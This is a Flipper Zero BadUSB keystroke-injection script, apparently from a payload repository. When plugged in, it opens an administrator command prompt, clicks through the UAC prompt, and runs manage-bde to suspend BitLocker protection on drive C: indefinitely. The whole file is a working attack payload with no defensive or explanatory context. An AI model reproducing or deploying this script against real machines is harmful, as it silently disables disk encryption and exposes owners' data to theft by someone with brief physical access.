Flipper/BadUSB/emptythevoid-BadUSB/bitlocker/bitlocker_disable.txt

14 lines
233 B
Plaintext
Raw Normal View History

2024-09-06 20:27:37 +00:00
REM launch command prompt as admin as fast as possible
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 3000
ALT y
DELAY 500
STRING manage-bde -protectors -Disable C: -RebootCount 0
ENTER
DELAY 500
ALT F4